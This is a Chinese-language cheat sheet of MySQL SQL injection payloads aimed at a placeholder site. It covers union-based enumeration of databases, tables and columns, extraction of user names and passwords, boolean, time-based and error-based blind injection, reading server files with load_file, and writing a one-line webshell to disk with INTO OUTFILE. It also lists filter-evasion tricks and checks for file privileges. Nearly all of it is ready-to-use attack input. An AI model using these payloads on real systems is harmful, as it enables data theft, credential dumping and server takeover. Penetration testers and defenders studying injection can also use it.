MySQL SQL注入笔记

常规报错

  • 猜字段数

    order by n/*

数字型

  • 获取当前数据库名:

    http://a.com/test/1.php?id=1 and 1=2 union select GROUP_CONCAT(DISTINCT+database()),2 from information_schema.columns

  • 获取所有表名:

    http://a.com/test/1.php?id=1 and 1=2 union select GROUP_CONCAT(DISTINCT+table_name),2 from information_schema.columns+where+table_schema=0x7374756479 //0x7374756479为数据库名的16进制

  • 获取表名中所有的字段:

    http://a.com/test/1.php?id=1 and 1=2 union select GROUP_CONCAT(DISTINCT+column_name),2 from information_schema.columns+where+table_name=0x7573657273 and table_schema=0x7374756479 //0x7573657273为表名的16进制

  • 获取数据:

    http://a.com/test/1.php?id=1 and 1=2 union select concat(字段1,0x2323,字段2),2 from 表名

字符型

http://a.com/test/1.php?id=admin%' and 1=2 union select 1,2,concat(name,0x2323,pass) from users%23

盲注

  • 使用 ascii (配上二分法食用更佳)
    • 获取数据库名

      http://a.com/test/1.php?id=1 and ord(substr(database(),1,1))=115 //判断数据库名的第一个字符的ascii,如果ascii与后面的数字不一样,则报错…

    • 获取表名

      http://a.com/test/1.php?id=1 and ord(substr((select distinct table_name from information_schema.columns where table_schema=0x7374756479 limit 1,1),1,1))=97

    • 获取字段

      http://a.com/test/1.php?id=1 and ord(substr((select name from users limit 0,1),1,1))=117

    • 获取数据

      http://a.com/test/1.php?id=1 and ord(substr((select name from users limit 0,1),1,1))=117

  • 使用正则表达式

    and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)

基于时间的盲注

SELECT target_column FROM target_table WHERE id=1 UNION SELECT IF(ord(substr(database(),1,1))=115, sleep(5),1)

基于报错

  • http://www.waitalone.cn/sql.php?id=1+and(select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name) as b)

  • updatexml(0x7e, concate(select user()),1) --+

MySQL 读写文件

  • create table a(cmd text);load data infile ’c:\xxx\xxx\xxx.txt’ into table a;select * from a;
  • create table a(cmd text);insert into a(cmd) values(load_file(’c:\ddd\ddd\ddd.txt’));select * from a
  • load_file(char(32,26,56,66))
  • load_file(0x633A5C626F6F742E696E69)
  • union select 1,2,3,char(这里写入你转换成10进制或16进制的一句话木马代码),5,6,7,8,9,10,7 into outfile ’d:web90team.php’/* union select 1,2,3,load_file(’d:weblogo123.jpg’),5,6,7,8,9,10,7 into outfile ’d:web90team.php’/*

注入技巧

  • 过滤空格注入 使用/**/或()或+代替空格

    %0c = form feed, new page

    %09 = horizontal tab

    %0d = carriage return

    %0a = line feed, new line

  • 相关函数 system_user() 系统用户名

    user() 用户名

    current_user 当前用户名

    session_user()连接数据库的用户名

    database() 数据库名

    version() MYSQL数据库版本

    load_file() MYSQL读取本地文件的函数

    @@datadir 读取数据库路径

    @@basedir MYSQL 安装路径

    @@version_compile_os 操作系统

  • 判断是否具有读写权限

    • and (select count(*) from mysql.user)>0/*
    • and (select count(file_priv) from mysql.user)>0/*
  • sleep 函数是每条记录停留多久,总的停留时间与记录数有关。